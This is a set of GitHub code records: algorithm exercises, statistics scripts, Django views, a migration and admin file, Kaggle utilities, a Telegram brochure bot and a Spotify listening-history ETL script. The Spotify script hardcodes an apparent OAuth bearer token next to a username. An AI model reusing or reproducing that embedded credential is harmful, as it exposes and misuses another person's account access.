+{"seq_id":"31099661600","text":"# -*- coding: utf-8 -*-\n\n# The diameter of a tree is the largest path\n# from a leaf to another leaf.\n# i.e: the largest path from one node\n# to another.\n# The common ancestor may not be the root\n\n\nclass Vertex:\n def __init__(self, label, left=None, right=None):\n self.label = label\n self.left = left\n self.right = right\n\n\ndef _tree_diameter(v, heights):\n if v is None:\n return 0\n left = _tree_diameter(v.left, heights)\n right = _tree_diameter(v.right, heights)\n heights[v] = left + right\n return 1 + max(left, right) # return one more edge\n\n\ndef tree_diameter(v):\n heights = {}\n _tree_diameter(v, heights)\n print(list(heights.values()))\n return max(heights.values())\n\n\n# Longest path is from i to m with b as common ancestor,\n# 8 edges\nt1 = Vertex('a',\n Vertex('b',\n Vertex('d',\n Vertex('f'),\n Vertex('g',\n Vertex('h',\n None,\n Vertex('i')))),\n Vertex('e',\n None,\n Vertex('j',\n Vertex('k'),\n Vertex('l',\n Vertex('m'))))),\n Vertex('c'))\n\n\nprint(tree_diameter(t1))\n","repo_name":"nitely/algo-design-manual-notes","sub_path":"solutions/05_19_tree_diameter.py","file_name":"05_19_tree_diameter.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"71913818089","text":"\"\"\"\r\nRegistration : 012-1111-0461-20\r\nRoll : 203012-21-0008 \r\nDescription : POISSON DISTRIBUTION\r\nAuthor : Chitrak Roychowdhury\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.stats import moment\r\nfrom scipy.special import factorial\r\n\r\n#POISSON DISTRIBUTION\r\n\r\nlamda = 5.0 ;\r\nN = 100000 \r\nP = np.random.poisson(lamda,N);\r\n\r\n#plotting histogram:\r\nn1,bins,patches = plt.hist(P,bins=18,density=True,color='lightgreen',ec='r',label='Poisson Distribution of 100000 \\nrandom numbers')\r\n\r\n#Plotting Poisson distribution for visualisation\r\nplt.plot(bins,(lamda**bins * np.exp(-lamda))/ factorial(bins), linewidth=2, color='k', label='Poisson distribution (Theoretical)')\r\nplt.title('Poisson Distribution')\r\nplt.xlabel('x $ \\longrightarrow $')\r\nplt.ylabel('$P_{poisson}(x)$ $ \\longrightarrow $')\r\nplt.legend()\r\nplt.xlim(-1,18)\r\nplt.grid(True)\r\nplt.show()\r\n\r\n# MOMENTS\r\nK = int(input(\"Calculate moment upto: \"))\r\nfor i in range(1,K+1):\r\n print(\"\\n\\t\\tMoment no: \",i)\r\n moment_no = moment(P,moment = i)\r\n print(\"* mu\",i,\": \",moment_no)\r\n\r\n#Theoretical moment\r\n ThMoment=0\r\n moment_=0\r\n for j in range(1,N):\r\n moment_ = ((P[j]-np.mean(P))**i)/N\r\n ThMoment+=moment_\r\n print(\"* Theoritical value: \",ThMoment)\r\n print( \"* Error =\" , moment_no-ThMoment)\r\n\r\n# CUMULANTS\r\nc1 = moment(P,1)\r\nprint(\"\\n1 st cumulant \",c1)\r\nc2 = np.mean(moment(P,2))-(np.mean(moment(P,1)))**2\r\nprint(\"2 nd cumulant \",c2)\r\nc3 = np.mean(moment(P,3))-(3*(np.mean(moment(P,2))*(np.mean(moment(P,1)))))+(2*np.mean(moment(P,1)**3))\r\nprint(\"3 rd cumulant \",c3)\r\nc4 = np.mean(moment(P,4))-(4*(c3)*(c1))-(3*c2**2)+(12*c2*c1**2)-(6*c1**4)\r\nprint(\"4 th Cumulant \",c4)\r\n","repo_name":"chitrak24/Statistical-Mechanics","sub_path":"Poisson Distribution.py","file_name":"Poisson Distribution.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"26820075998","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\n\ncluster_result = np.zeros(10000)\n\n# 从pickle文件读取降维结果\nwith open(\"./result/part-00000\",\"rb\") as result:\n for i in range(10000):\n line = result.readline()\n cluster_result[i] = int(line)\n\nwith open(\"usdata.pickle\", \"rb\") as usdata:\n data = pickle.load(usdata)\n y = cluster_result[:10000] # 这里,y表示聚类结果(一维向量,list或者numpy.array都可以)\n # y = np.zeros(5000)\n # y = np.append(y, np.ones(5000), 0)\n # y = np.random.randint(0, 5, 10000)\n plt.scatter(data[:, 0], data[:, 1], c=y)\n plt.show()\n","repo_name":"YunFeng0817/bigdata_analyse","sub_path":"lab2/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"71536857447","text":"\"\"\"\nExtraction that it allows to get the information of my count of Spotify, show them\nwhat i have listed last 24 hours\n\nThe idea is to create the ETL.\n\"\"\"\n\n#import sqlalchemy\nimport pandas as pd \n#from sqlalchemy.orm import sessionmaker\nimport requests\nimport json\nfrom datetime import datetime\nimport datetime\nimport sqlite3\n\n\nDATABASE_LOCATION = \"\"\n\n# Data user SP\n\nUSER_ID = \"carolina.munozce\"\nTOKEN = \"BQBWr-KU7mV9ZBjdi3FXI2FjEL5_klcUVWUUyZnYtfOcuBL19LyEGJk_F1FUYF2bAF55QoJuNVbipCA05X8SBIsk4_faRkBbiXUHlUV0aL9hicTj5zkuqXZlH-Kxk6tPotm5Nw8XQT3lYkECIpNIZIcK2mZs\"\n\ndef check_if_valid_data(df: pd.DataFrame) -> bool:\n #Check if dataframe is empty. In this case, if we don't listen any music on SP\n if df.empty:\n print(\" No songs download. Finish execution\")\n return False\n\n # Primary key check -> For duplicate data\n if pd.Series(df['played_at']).is_unique:\n pass\n else:\n raise Exception(\"Primary key check is violed\")\n\n # Check any null\n #if df.isnull().values.any():\n # raise Exception(\"Null value found\")\n\n # Check that all timestamps are of yesterday's date\n yesterday = datetime.datetime.now() - datetime.timedelta(days=1)\n yesterday = yesterday.replace(hour=0, minute=0, second=0,microsecond=0)\n\n timestamps = df[\"timestamps\"].tolist()\n for timestamp in timestamps:\n if datetime.datetime.strptime(timestamp,\"%Y-%m-%d\") != yesterday:\n raise Exception(\"At least one of the returned songs does not come fron within the last 24 hours\")\n return True\n\nif __name__ == \"__main__\":\n \n headers = {\n \"Accept\": \"application/json\",\n \"Content-Type\": \"application/json\",\n \"Authorization\": \"Bearer {token}\".format(token=TOKEN)\n }\n #Convert unix timestamp in milliseconds\n today =datetime.datetime.now()\n yesterday = today - datetime.timedelta(days=1)\n yesterday_unix_timestamp = int(yesterday.timestamp())* 1000\n\n # Get request from SP last 24 hours\n\n r = requests.get(\"https://api.spotify.com/v1/me/player/recently-played?after={time}\".format(time=yesterday_unix_timestamp), headers = headers)\n\n data = r.json()\n # print (data)\n\n song_names = []\n artist_names = []\n played_at_list = []\n timestamps = []\n\n for song in data[\"items\"]:\n song_names.append(song[\"track\"][\"name\"])\n artist_names.append(song[\"track\"][\"album\"][\"artists\"][0][\"name\"])\n played_at_list.append(song[\"played_at\"])\n timestamps.append(song[\"played_at\"][0:10])\n\n song_dict = {\n \"song_name\": song_names,\n \"artist_names\": artist_names,\n \"played_at\": played_at_list,\n \"timestamps\": timestamps\n }\n\n song_df = pd.DataFrame(song_dict, columns= [\"song_name\",\"artist_name\",\"played_at\",\"timestamps\"])\n \n #Validate the song\n if check_if_valid_data(song_df):\n print(\"Data valid, process to Load stage\")\n\n print (song_df)\n\n ","repo_name":"carolinamunozce/spotify_extraction","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"71681605288","text":"from interface.error import data_no_found\nfrom django.shortcuts import render,redirect,HttpResponse\nfrom user.models import User_Profile,User, Permission\nfrom user_crap.models import user_crap\nfrom .error import data_no_found\nfrom .utily import REQUEST\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.views.decorators.clickjacking import xframe_options_sameorigin\nfrom .models import HOME_PAGE_IMAGE,HOME_PAGE_ARTICALSE\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse\n\n\n\n\n# Create your views here\n\n\n\n#1\ndef home(request):\n # return HttpResponse(\"hello world\")\n req = REQUEST(request)\n imgs = list(HOME_PAGE_IMAGE.objects.all())\n articles = list(HOME_PAGE_ARTICALSE.objects.all())\n img = None\n try:\n img = imgs[0]\n imgs = imgs[1:]\n except:\n imgs = None\n img = None\n return render(request,\"home.html\",{\"pg_no\":1,\"imgs\":imgs,\"img\":img,\"toggle\":0,\"articles\":articles})\n\n\n\"\"\"____________\"\"\"\n#2 comes under appstore\ndef upload(request):\n req = REQUEST(request)\n objs = list()\n for oj in user_crap.objects.all():\n objs.append(oj.title)\n objs = set(objs)\n if req.LOGIN_LOGOUT().is_login():\n # if request.method == \"POST\":\n # user = request.POST.get(\"user\")\n # title = request.POST.get(\"title\")\n # file = request.FILES.get(\"file\")\n # decs = request.POST.get(\"decs\")\n # data_type = request.POST.get(\"data_type\")\n # if user != None and title != None and file != None and decs != None and data_type != None:\n # try:\n # print(type(file))\n # user_crap.objects.create(user=user,title=title,data=file,decs=decs,type_data=data_type)\n # return req.SUCCESS().success(f\"your data is uploaded file name:-{file} and title:-{title}\",req=None,upload=True,appstore=True)\n # except Exception as e:\n # print(e)\n # return req.ERROR().error(\"Some thimg went wrong\")\n # pass\n # else:\n # return req.ERROR().error(\"Some feilds are missing\")\n # # print(user,title,file,decs)\n if request.is_ajax():\n user = request.POST.get(\"user\")\n title = request.POST.get(\"title\")\n file = request.FILES.get(\"file\")\n decs = request.POST.get(\"decs\")\n data_type = request.POST.get(\"data_type\")\n if user != None and title != None and file != None and decs != None and data_type != None:\n try:\n # print(type(file))\n user_crap.objects.create(user=user,title=title,data=file,decs=decs,type_data=data_type)\n return req.SUCCESS().success(f\"your data is uploaded file name:-{file} and title:-{title}\",req=None,upload=True,appstore=True)\n except Exception as e:\n print(e)\n return req.ERROR().error(\"Some thimg went wrong\")\n pass\n else:\n return req.ERROR().error(\"Some feilds are missing\")\n # print(user,title,file,decs)\n else:\n return req.ERROR().error(\"you have to login first\")\n return render(request,\"upload.html\",{\"pg_no\":2,\"user\":str(request.user),\"objs\":objs})\n#2\ndef appstore(request):\n req = REQUEST(request)\n flag = 0\n data_type = [\"app\",\"music\",\"pdf\",\"doc\",\"video\",\"compress_file\",\"image\"]\n objs = list(user_crap.objects.all())[-100:]\n items = list()\n for oj in user_crap.objects.all():\n items.append(oj.title)\n items = set(items)\n items = list(items)\n items.extend(data_type)\n \n if request.method == \"POST\":\n item = request.POST.get(\"search\")\n copy = item\n if copy.lower() in data_type:\n temp = user_crap.objects.filter(type_data__contains=item)\n else:\n temp = 
user_crap.objects.filter(title__contains=item)\n objs = list(temp)\n try:\n objs[0]\n print(\" \")\n except:\n flag += 1\n \n if flag != 0:\n return req.ERROR().error(\"No data found\")\n\n return render(request,\"appstore.html\",{\"pg_no\":2,\"objs\":objs,\"items\":items})\n\n#2\n@xframe_options_sameorigin\ndef show_data(request):\n req = REQUEST(request)\n if request.method == \"POST\":\n ID = request.POST.get(\"id\")\n \n if ID != None:\n data = user_crap.objects.get(id = ID)\n \n return render(request,\"ysdfgjdgsj.html\",{\"pg_no\":2,\"data\":data})\n else:\n return req.ERROR().error(\"This page is not ment to use in this way\")\n\"\"\"____________\"\"\"\n\n#3\ndef signup(request):\n req = REQUEST(request)\n if req.LOGIN_LOGOUT().is_login():\n return req.ERROR().error(\"You are already login in for sign up you have to logout\")\n\n if request.method == \"POST\":\n # username = request.POST.get(\"username\")\n # password = request.POST.get(\"password\")\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('login')\n else:\n form = UserCreationForm()\n return render(request,\"signup.html\",{\"pg_no\":3,\"form\":form})\n# 2\n# audio\n# @csrf_exempt\n# def audio(request):\n# if request.method == \"POST\":\n# obj_id = request.POST.get('obj_id')\n# return HttpResponse(\"audio\")\n\n#4\ndef login(request):\n req = REQUEST(request)\n if req.LOGIN_LOGOUT().is_login():\n return redirect(\"home\")\n\n\n if request.method == \"POST\":\n username = request.POST.get(\"username\")\n password = request.POST.get(\"password\")\n if len(username) == 0 or len(password) == 0:\n # print(\"hello\")\n return req.ERROR().error(\"username or password is empty\")\n else:\n if(req.LOGIN_LOGOUT().user_login(username,password)):\n user = req.LOGIN_LOGOUT().ret_user()\n return req.SUCCESS().success(\"you are login\",user.is_superuser)\n else:\n return req.ERROR().error(\"Login not successful\")\n \n return render(request,\"login.html\",{\"pg_no\":4})\n\n\n\ndef logout(request):\n req = REQUEST(request)\n if req.LOGIN_LOGOUT().user_logout():\n return req.SUCCESS().success(\"you are logout\")\n else:\n return req.ERROR().error(\"Your are not login\")\n\n","repo_name":"anshjoseph/home-nas","sub_path":"HOME_NAS/interface/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6461,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"38518399104","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 17 23:07:54 2017\r\n\r\n@author: vrtjso\r\n\"\"\"\r\nimport numpy as np\r\nimport pandas as pd\r\nimport random\r\nfrom operator import le, eq\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn import model_selection, preprocessing\r\n\r\ndef RMSLE(y, yfit):\r\n n = len(y)\r\n s = 0\r\n for i in range(0,n):\r\n s += (np.log(yfit[i] + 1) - np.log(y[i] + 1)) ** 2\r\n RMSLE = np.sqrt(s/n)\r\n return RMSLE\r\n\r\n\r\n#Objective function used for xgb\r\ndef objective(yfit, dtrain):\r\n y = dtrain.get_label()\r\n g = 2 * (np.log(yfit + 1) - np.log(y + 1)) / (yfit + 1)\r\n h = (2 - 2 * np.log(yfit + 1) + 2 * np.log(y + 1)) / ((yfit + 1) ** 2)\r\n #n = dtrain.num_row()\r\n #g = []\r\n #h = []\r\n #for i in range(0,n):\r\n # g.append(2 * (np.log(yfit[i] + 1) - np.log(y[i] + 1)) / (yfit[i] + 1))\r\n # h.append((2 - 2 * np.log(yfit[i] + 1) + 2 * np.log(y[i] + 1)) / ((yfit[i] + 1) ** 2))\r\n return g, h\r\n\r\n#Metric used for xgb cv\r\ndef eval_metric(yfit, dtrain):\r\n y = dtrain.get_label()\r\n return 'error', RMSLE(y,yfit)\r\n\r\ndef CreateOutput(prediction):\r\n output = pd.read_csv('test.csv')\r\n output = output[['id']]\r\n output['price_doc'] = prediction\r\n output.to_csv('Submission.csv',index=False)\r\n \r\n \r\n#load data\r\ndef loadTraindata(takeLog=True):\r\n #filename = 'train.csv'\r\n filename = 'train_featured.csv'\r\n rawDf = pd.read_csv(filename)\r\n Ytrain = rawDf['price_doc'].values\r\n Xtrain = rawDf.drop(['price_doc','w'], 1).values\r\n return Ytrain, Xtrain\r\n\r\ndef loadTestdata():\r\n #filename = 'test.csv'\r\n filename = 'test_featured.csv'\r\n rawDf = pd.read_csv(filename)\r\n Xtest = rawDf.values\r\n return Xtest\r\n\r\n#load random small part of data for fast model testing\r\ndef loadSample(n=300):\r\n #filename = 'train.csv'\r\n #filename = 'train_cleaned.csv'\r\n filename = 'train_featured.csv'\r\n size = pd.read_csv(filename).shape[0]\r\n skip = sorted(random.sample(range(1,size+1),size-n))\r\n rawDf = pd.read_csv(filename, skiprows = skip)\r\n\r\n Ytrain = rawDf['log_price'].values\r\n Xtrain = rawDf.drop(['log_price'], 1).values\r\n return Ytrain, Xtrain\r\n\r\n#Used to undersample strange values\r\ndef sample_vals(df, price_value, ratio, condition):\r\n indices = condition(df.price_doc, price_value) & (df.product_type == 0)\r\n df_resampled = df.loc[indices].sample(frac=ratio)\r\n df_remaining = df.loc[~indices]\r\n df_new = pd.concat([df_resampled, df_remaining], axis=0)\r\n return df_new\r\n\r\n#Encoding dummy variables\r\ndef Encoding(TestEncoding = True):\r\n filename = 'test.csv' if TestEncoding else 'train.csv'\r\n rawDf = pd.read_csv(filename)\r\n \r\n #Drop variable with no use and small variance, and sub area\r\n rawDf = rawDf.drop([\"id\",\"ID_metro\",\"ID_railroad_station_walk\",\"ID_railroad_station_avto\",\r\n \"ID_big_road1\", \"ID_big_road2\", \"ID_railroad_terminal\", \"ID_bus_terminal\"],1)\r\n rawDf = rawDf.drop([\"culture_objects_top_25_raion\",\"oil_chemistry_raion\",\"railroad_terminal_raion\",\r\n \"nuclear_reactor_raion\", \"build_count_foam\", \"big_road1_1line\",\"railroad_1line\",\r\n \"office_sqm_500\", \"trc_sqm_500\", \"cafe_count_500_price_4000\", \"cafe_count_500_price_high\",\r\n \"mosque_count_500\", \"leisure_count_500\", \"office_sqm_1000\", \"trc_sqm_1000\",\r\n \"cafe_count_1000_price_high\", \"mosque_count_1000\", \"cafe_count_1500_price_high\",\r\n \"mosque_count_1500\", \"cafe_count_2000_price_high\"],1)\r\n #rawDf = 
rawDf.drop('sub_area',1)\r\n \r\n result = rawDf\r\n for i in range(1,rawDf.shape[1]): #Do not encode timestamp\r\n if rawDf.ix[:,i].dtype == np.object:\r\n varName = rawDf.columns[i]\r\n if varName == 'sub_area':\r\n dummy_ranks = pd.get_dummies(rawDf[varName], prefix = varName)\r\n else:\r\n dummy_ranks = pd.get_dummies(rawDf[varName], prefix = varName, drop_first=True)\r\n result = pd.concat([result, dummy_ranks], axis=1)\r\n result = result.drop(varName, 1)\r\n varName = 'material' #special case\r\n dummy_ranks = pd.get_dummies(rawDf[varName], prefix = varName)\r\n result = pd.concat([result, dummy_ranks], axis=1)\r\n result = result.drop(varName, 1)\r\n outputFile = 'test_encoded.csv' if TestEncoding else 'train_encoded.csv'\r\n result.to_csv(outputFile,index=False)\r\n #return result\r\n\r\n#用PCA合并同一个系列高度相关的feature\r\ndef FeatureCombination(Df,s='',num_feature=2): \r\n feature_set = []\r\n for c in Df.columns:\r\n if c.startswith(s): feature_set.append(c)\r\n print('combining', len(feature_set), 'features')\r\n data = Df[feature_set].values\r\n\r\n for c in Df.columns:\r\n if Df[c].dtype == 'object':\r\n lbl = preprocessing.LabelEncoder()\r\n lbl.fit(list(Df[c].values))\r\n Df[c] = lbl.transform(list(Df[c].values))\r\n \r\n imp = preprocessing.Imputer()\r\n data = imp.fit_transform(data)\r\n data = preprocessing.scale(data)\r\n pca = PCA(num_feature)\r\n pca.fit(data)\r\n print('explained_variance_ratio_:', pca.explained_variance_ratio_)\r\n trans = pca.transform(data)\r\n for i in range(0,num_feature):\r\n Df[s+'_%d'%(i+1)] = trans[:,i]\r\n Df.drop(feature_set,1,inplace=True)\r\n return Df","repo_name":"LenzDu/Kaggle-Competition-Sberbank","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":5320,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"53"}
+{"seq_id":"20556965249","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n STR_DATE_CREATED = b'date created'\n STR_DATE_UPDATED = b'date updated'\n STR_QUIZ_QUESTION = 'quiz.Question'\n STR_QUIZ_QUIZ = 'quiz.Quiz'\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Question',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('created_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_CREATED)),\n ('lastupdated_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_UPDATED)),\n ('title', models.TextField()),\n ('type', models.CharField(default=b'multichoice',\n max_length=15,\n choices=[(b'multichoice',\n b'Multiple choice'),\n (b'shortanswer'\n b'Short answer'),\n (b'matching',\n b'Matching'),\n (b'numerical',\n b'Numerical'),\n (b'multiselect',\n b'Multiple select'),\n (b'description',\n b'Information only'),\n (b'essay',\n b'Essay question')])),\n ('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'Question',\n 'verbose_name_plural': 'Questions',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='QuestionProps',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('value', models.TextField(blank=True)),\n ('question', models.ForeignKey(to=STR_QUIZ_QUESTION,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'QuestionProp',\n 'verbose_name_plural': 'QuestionProps',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='Quiz',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('created_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_CREATED)),\n ('lastupdated_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_UPDATED)),\n ('draft', models.BooleanField(default=False)),\n ('deleted', models.BooleanField(default=False)),\n ('title', models.TextField()),\n ('description', models.TextField(blank=True)),\n ('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'Quiz',\n 'verbose_name_plural': 'Quizzes',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='QuizAttempt',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('attempt_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=b'date attempted')),\n ('submitted_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=b'date submitted')),\n ('score', models.DecimalField(max_digits=6,\n decimal_places=2)),\n ('maxscore', models.DecimalField(max_digits=6,\n decimal_places=2)),\n ('ip', models.IPAddressField()),\n ('instance_id', models.CharField(max_length=50,\n null=True,\n blank=True)),\n ('agent', models.TextField(blank=True)),\n ('quiz', models.ForeignKey(to=STR_QUIZ_QUIZ,\n on_delete=models.CASCADE)),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL,\n 
on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'QuizAttempt',\n 'verbose_name_plural': 'QuizAttempts',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='QuizAttemptResponse',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('score', models.DecimalField(max_digits=6,\n decimal_places=2)),\n ('text', models.TextField(blank=True)),\n ('question', models.ForeignKey(to=STR_QUIZ_QUESTION,\n on_delete=models.CASCADE)),\n ('quizattempt', models.ForeignKey(to='quiz.QuizAttempt',\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'QuizAttemptResponse',\n 'verbose_name_plural': 'QuizAttemptResponses',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='QuizProps',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('value', models.TextField(blank=True)),\n ('quiz', models.ForeignKey(to=STR_QUIZ_QUIZ,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'QuizProp',\n 'verbose_name_plural': 'QuizProps',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='QuizQuestion',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('order', models.IntegerField(default=1)),\n ('question', models.ForeignKey(to=STR_QUIZ_QUESTION,\n on_delete=models.CASCADE)),\n ('quiz', models.ForeignKey(to=STR_QUIZ_QUIZ,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'QuizQuestion',\n 'verbose_name_plural': 'QuizQuestions',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='Response',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('created_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_CREATED)),\n ('lastupdated_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_UPDATED)),\n ('score', models.DecimalField(default=0,\n max_digits=6,\n decimal_places=2)),\n ('title', models.TextField()),\n ('order', models.IntegerField(default=1)),\n ('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE)),\n ('question', models.ForeignKey(to=STR_QUIZ_QUESTION,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'Response',\n 'verbose_name_plural': 'Responses',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='ResponseProps',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('value', models.TextField(blank=True)),\n ('response', models.ForeignKey(to='quiz.Response',\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'ResponseProp',\n 'verbose_name_plural': 'ResponseProps',\n },\n bases=(models.Model, ),\n ),\n migrations.AddField(\n model_name='quiz',\n name='questions',\n field=models.ManyToManyField(to=STR_QUIZ_QUESTION,\n through='quiz.QuizQuestion'),\n preserve_default=True,\n ),\n ]\n","repo_name":"DigitalCampus/django-oppia","sub_path":"quiz/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":11507,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"}
+{"seq_id":"25122188394","text":"# Bu araç @keyiflerolsun tarafından | @KekikAkademi için yazılmıştır.\n\nfrom telethon import TelegramClient\nfrom telethon.sessions import StringSession\nfrom telethon.errors.rpcerrorlist import MediaEmptyError\n\nfrom contextlib import suppress\nfrom json import loads\nfrom aiofiles import open\nfrom os import environ, path\nfrom veri_ver import a101_brosurler\n\nclient = TelegramClient(\n session = StringSession(),\n api_id = int(environ.get(\"TG_API_ID\")),\n api_hash = environ.get(\"TG_API_HASH\")\n).start(bot_token = environ.get(\"TG_BOT_TOKEN\"))\n\nasync def aktuel_robot():\n if path.isfile(\"A101.json\"):\n async with open(\"A101.json\", \"r+\", encoding=\"utf-8\") as dosya:\n eski_veriler = loads(await dosya.read())\n else:\n eski_veriler = {}\n\n yeni_veriler = await a101_brosurler()\n\n for anahtar, resimler in yeni_veriler.items():\n if not resimler:\n continue\n\n eski_resimler = eski_veriler.get(anahtar, [])\n yeni_resimler = [resim for resim in resimler if resim not in eski_resimler]\n\n for resim in yeni_resimler:\n try:\n await client.send_file(int(environ.get(\"TG_MESAJ_ID\")), resim, caption=f\"**{anahtar}**\")\n except Exception as hata:\n print(f\"Resim : {resim}\")\n print(f\"Hata : {type(hata).__name__} - {hata}\")\n\nif __name__ == \"__main__\":\n with client:\n client.loop.run_until_complete(aktuel_robot())","repo_name":"keyiflerolsun/A101AktuelRobot","sub_path":"basla.py","file_name":"basla.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"tr","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"}
+{"seq_id":"2490615892","text":"from django.contrib import admin\nfrom django.contrib.auth import forms\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.contrib.auth.base_user import BaseUserManager\n# Register your models here.\n\nfrom .models import User, UserProfile, EmployeeIDInformation, EmployeeNextOfKin, EmployeeMaritalInformation, EmployeeDependants, EmployeeBankInformation\nfrom .forms import UserCreationForm, UserChangeForm, RegistrationForm\n\nemployeeModels = [EmployeeIDInformation, EmployeeNextOfKin, EmployeeMaritalInformation, EmployeeDependants, EmployeeBankInformation]\n\nclass EmployeeBankInformationInline(admin.StackedInline):\n model = EmployeeBankInformation\n can_delete = False\n verbose_plural_name =\"Employee Bank Information\"\n foreignkey_name = 'staffID'\n\nclass EmployeeDependantsInline(admin.StackedInline):\n model = EmployeeDependants\n can_delete = False\n verbose_plural_name =\"Employee Dependants Information\"\n foreignkey_name = 'staffID'\n\nclass EmployeeMaritalInformationInline(admin.StackedInline):\n model = EmployeeMaritalInformation\n can_delete = False\n verbose_plural_name =\"Employee Marital Information\"\n foreignkey_name = 'staffID'\n\nclass EmployeeNextOfKinInline(admin.StackedInline):\n model = EmployeeNextOfKin\n can_delete = False\n verbose_plural_name =\"Employee Next of Kin Information\"\n foreignkey_name = 'staffID'\n\nclass EmployeeIDInformationInline(admin.StackedInline):\n model = EmployeeIDInformation\n can_delete = False\n verbose_plural_name =\"Employee ID Information\"\n foreignkey_name = 'staffID'\n\nclass UserProfileInline(admin.StackedInline):\n model = UserProfile\n can_delete = False\n verbose_plural_name =\"User Profile\"\n foreignkey_name = 'user'\n\nclass CustomUserAdmin(UserAdmin):\n model = User\n form = UserChangeForm\n add_form = UserCreationForm\n\n list_display = ('email', 'first_name', 'last_name', 'username', 'phone_number', 'is_staff', 'is_superuser', 'date_of_birth')\n # inlines = (EmployeeIDInformationInline,)\n inlines = (UserProfileInline, EmployeeIDInformationInline, EmployeeNextOfKinInline, EmployeeMaritalInformationInline, \n EmployeeDependantsInline, EmployeeBankInformationInline,)\n list_filter = ['is_superuser']\n\n add_fieldsets = UserAdmin.add_fieldsets + (\n ('Personal Information',\n {'fields':(\n 'email',\n ('first_name', 'middle_name', 'last_name', 'date_of_birth', 'gender')\n , 'phone_number', 'city','country',)\n }),\n ('Company Information',{\n 'fields':(\n 'is_staff', 'is_superuser','is_active',\n )\n }),\n )\n\n fieldsets = UserAdmin.fieldsets + (\n ('Personal Information', \n 